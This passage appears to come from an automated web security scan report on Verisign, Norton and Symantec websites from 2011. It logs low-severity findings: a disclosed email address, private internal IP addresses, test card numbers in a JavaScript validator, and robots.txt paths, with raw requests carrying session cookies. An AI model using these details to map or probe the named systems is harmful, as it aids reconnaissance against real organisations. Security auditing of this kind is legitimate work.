Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Type: text/html
Content-Length: 104571

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" />

   <!--HEADER ASSETS-->
       <link href="ht
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.68. http://www.verisign.com/trust-seal/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /trust-seal/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:13 GMT
Content-Type: text/html
Content-Length: 49851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="X-UA-Comp
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.69. http://www.verisign.com/verisign-worldwide/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /verisign-worldwide/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /verisign-worldwide/index.html?tid=footer HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:10 GMT
Content-Type: text/html
Content-Length: 42646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
   <head>
               
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.70. https://www.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:30:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:30:44 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 34637

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

17.71. https://www.verisign.com/products-services/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /products-services/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /products-services/index.html HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://securitycenter.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:46 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 107427

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

   <!--HEADER ASSETS-->
       <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

18. Private IP addresses disclosed
There are 3 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


18.1. http://query.verisign.com/cluster.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.com
Path:   /cluster.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /cluster.js HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:45 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT
Content-Length: 8783
Cache-Control: public, max-age=31622400
Expires: Sun, 09 Sep 2012 21:24:45 GMT
Vary: Accept-Encoding

// Copyright 2006 Google Inc., All Rights Reserved
// dspencer@google.com


/**
* @fileoverview
*
* This file is for the rendering of Clustered Search results
* on the GSA.
*
*
* The flow is:

...[SNIP]...
put=xml_no_dtd&sort=date%3AD%3AL%3Ad1&
* ie=UTF-8&btnG=Google+Search&client=f7&q=china&ud=1&
* site=default_collection&oe=UTF-8&proxystylesheet=f7&
* ip=172.18.68.100"
*
* @param {Function} render: The rendering function which is called on
* completion with 2 arguments, the search URL (the arg above) and the JSON
* blob that comes back from the CS.
*
...[SNIP]...

18.2. http://query.verisign.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.com
Path:   /search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1
Host: query.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:07 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 52678


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<body onload="pruneHeaders();resetForms(); cs_loadClusters('q=xss&amp;site=vrsn&amp;client=vrsn_frontend&amp;output=xml_no_dtd&amp;proxystylesheet=vrsn_frontend&amp;ie=UTF-8&amp;ip=10.244.28.108&amp;access=p&amp;sort=date%3AD%3AL%3Ad1&amp;entqr=1&amp;entsp=0&amp;oe=UTF-8&amp;ud=1', cs_drawClusters); " dir="ltr">
...[SNIP]...
itesearch=https://knowledge.verisign.com/support/mpki-for-ssl-support/index&amp;q=xss&amp;site=vrsn&amp;client=vrsn_frontend&amp;output=xml_no_dtd&amp;proxystylesheet=vrsn_frontend&amp;ie=UTF-8&amp;ip=10.244.28.108&amp;access=p&amp;sort=date%3AD%3AL%3Ad1&amp;entqr=1&amp;entsp=0&amp;oe=UTF-8&amp;ud=1">
...[SNIP]...
earch=https://knowledge.verisign.com/support/ssl-certificates-support/index&amp;q=xss&amp;site=vrsn&amp;client=vrsn_frontend&amp;output=xml_no_dtd&amp;proxystylesheet=vrsn_frontend&amp;ie=UTF-8&amp;ip=10.244.28.108&amp;access=p&amp;sort=date%3AD%3AL%3Ad1&amp;entqr=1&amp;entsp=0&amp;oe=UTF-8&amp;ud=1">
...[SNIP]...
<a href="search?q=xss&amp;site=vrsn&amp;client=vrsn_frontend&amp;output=xml_no_dtd&amp;proxystylesheet=vrsn_frontend&amp;ie=UTF-8&amp;ip=10.244.28.108&amp;access=p&amp;sort=date%3AD%3AL%3Ad1&amp;entqr=1&amp;entsp=0&amp;oe=UTF-8&amp;ud=1&amp;filter=0">
...[SNIP]...

18.3. https://query.verisign.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   https://query.verisign.com
Path:   /search

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /search HTTP/1.1
Host: query.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:20 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 44676
Connection: close


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=7">
<meta http-equiv="c
...[SNIP]...
<body onload="pruneHeaders();resetForms(); cs_loadClusters('site=vrsn&amp;client=vrsn_frontend&amp;output=xml_no_dtd&amp;proxystylesheet=vrsn_frontend&amp;ie=UTF-8&amp;ip=10.244.28.107&amp;access=p&amp;sort=date%3AD%3AL%3Ad1&amp;entqr=1&amp;entsp=0&amp;oe=UTF-8&amp;ud=1', cs_drawClusters); " dir="ltr">
...[SNIP]...

19. Credit card numbers disclosed
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


19.1. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/js/commonValidation2-9-06.js

Issue detail

The following credit card number was disclosed in the response:

Request

GET /renewals/js/commonValidation2-9-06.js HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:36 GMT
Content-Length: 32366
Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT
Accept-Ranges: bytes

// $Id: commonValidation2-9-06.js 82 2008-01-30 00:07:20Z mhallesy $
//please do not make changes to this file!
//if you need to modify it, please make a copy, since this script is used by multipl
...[SNIP]...
Reverse(n);
var total = AddedTogether(reversed);
if(total % 10 > 0) { return 0; }
return 1;
} // Mod10()

function CheckTestCard(n) {
isTest = false;
if (n == ("4567765445677654" || "4321123443211234")) { isTest = true;}
return isTest;
} // CheckTestCard

function ValidateCC(formContents) {
ccNumberChecked = StripNonDigits(formContents);
ccType = GetType(ccNumberChecked);
ccNumb
...[SNIP]...

19.2. http://us.norton.com/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf

Issue detail

The following credit card number was disclosed in the response:

Request

GET /content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 720962
Last-Modified: Thu, 08 Oct 2009 21:38:05 GMT
ETag: "b0042-4ace5bbd"
Accept-Ranges: bytes
Content-Type: application/pdf
Cache-Control: public, max-age=2171
Date: Fri, 09 Sep 2011 21:47:13 GMT
Connection: close

%PDF-1.4%....
...[SNIP]...

20. Robots.txt file
There are 47 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


20.1. http://1168.ic-live.com/goat.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1168.ic-live.com
Path:   /goat.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1168.ic-live.com

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:26:17 GMT
Server: Apache
Last-Modified: Mon, 08 Aug 2011 21:54:33 GMT
ETag: "37843a-72f-4aa057e0a3840"
Accept-Ranges: bytes
Content-Length: 1839
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Cache: MISS from i2a-coll-7
X-Cache-Lookup: MISS from i2a-coll-7:80
Via: 1.0 i2a-coll-7:80 (squid/2.6.STABLE21)
Connection: close

...User-agent: *
Disallow: /allCountryCodes.txt
Disallow: /altidconv.php
Disallow: /backup/
Disallow: /bugs-dec16.tar
Disallow: /cgi-bin/
Disallow: /checktime.php
Disallow: /client-kit/
Disallow: /com
...[SNIP]...

20.2. http://admin.instantservice.com/resources/smartbutton/5851/42379/available.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.instantservice.com
Path:   /resources/smartbutton/5851/42379/available.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: admin.instantservice.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT
ETag: "1a-887f66c0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

20.3. https://admin.instantservice.com/links/5851/14753

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.instantservice.com
Path:   /links/5851/14753

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: admin.instantservice.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT
ETag: "1a-887f66c0"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /

20.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.verisign.com
Path:   /authweb/global/assets/shared/images/nav/nav_grad.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.verisign.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:11 GMT
Server: Apache
Last-Modified: Wed, 05 Mar 2008 18:53:14 GMT
ETag: "1a6035a-21-221fba80"
Accept-Ranges: bytes
Content-Length: 33
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *
Disallow: /stooge/

20.5. http://buy-static.norton.com/estore/images/master/misc/gradient_background.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy-static.norton.com
Path:   /estore/images/master/misc/gradient_background.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: buy-static.norton.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a
Last-Modified: Mon, 23 Aug 2010 19:28:11 GMT
ETag: "1f84c4-1c-48e82a62248c0"
Accept-Ranges: bytes
Content-Length: 28
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:31:19 GMT
Connection: close

User-agent: *
Disallow: /

20.6. https://buy-static.norton.com/estore/images/en/Non-Product/Misc/LiveChat/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy-static.norton.com
Path:   /estore/images/en/Non-Product/Misc/LiveChat/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: buy-static.norton.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a
Last-Modified: Fri, 20 Aug 2010 19:33:33 GMT
ETag: "5e44c4-1c-48e465fcd7d40"
Accept-Ranges: bytes
Content-Length: 28
Content-Type: text/plain
Date: Fri, 09 Sep 2011 21:37:23 GMT
Connection: close

User-agent: *
Disallow: /

20.7. http://buy.norton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: buy.norton.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:31:16 GMT
Content-Length: 34
Content-Type: text/html
X-Powered-By: Servlet/2.5 JSP/2.1

User-agent: *
<br>Disallow: /
<br>

20.8. http://cdn.verisign.com/assets/trust-seal/css/hp.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.verisign.com
Path:   /assets/trust-seal/css/hp.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.verisign.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "29ac2fd-9eb-49a38fa8970c0"
Accept-Ranges: bytes
Content-Type: text/plain
Age: 3946
Date: Fri, 09 Sep 2011 21:26:14 GMT
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
Expires: Sun, 09 Oct 2011 20:20:28 GMT
Content-Length: 2539
Connection: close

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...

20.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.cacheimage.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.verisign.com

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/plain
Connection: close
ETag: "28e934c-9eb-49a38fa8970c0"
Accept-Ranges: bytes
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 2539

User-Agent: *
Disallow: /aol/
Disallow: /att/
Disallow: /authentic/
Disallow: /aventail/
Disallow: /b2b/
Disallow: /cd/
Disallow: /cdrom/
Disallow: /cgi-bin/
Disallow: /checkpoint/
Disallow: /client/

...[SNIP]...

20.10. http://ch.norton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ch.norton.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ch.norton.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Length: 534
Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT
ETag: "216-4c51e49d"
Accept-Ranges: bytes
Content-Type: text/plain;charset=UTF-8
Cache-Control: public, max-age=14107
Date: Fri, 09 Sep 2011 21:41:25 GMT
Connection: close

User-agent:*
Disallow:/common/
Disallow:/content/
Disallow:/corp/
Disallow:/css/
Disallow:/ssi/
Disallow:/lib/
Disallow:/errors/
Disallow:/feedback/
Disallow:/media/
Disallow:/script/
Disal
...[SNIP]...

20.11. http://com-verisign.netmng.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://com-verisign.netmng.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: com-verisign.netmng.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:40 GMT
Server: Apache/2.2.9
Last-Modified: Tue, 06 Apr 2010 14:04:58 GMT
ETag: "1c44a1-1a-48391ee477680"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

20.12. http://community.norton.com/norton/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.norton.com
Path:   /norton/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: community.norton.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Last-Modified: Fri, 09 Sep 2011 07:04:51 GMT
ETag: "82786-17b-4ac7ccb32122c"
Accept-Ranges: bytes
Content-Length: 379
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

20.13. http://de.community.norton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.community.norton.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: de.community.norton.com

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 09 Sep 2011 02:17:05 GMT
ETag: "35c1329-199-4ac78c6034a40"
Accept-Ranges: bytes
Content-Length: 409
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

20.14. https://drh.img.digitalriver.com/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://drh.img.digitalriver.com
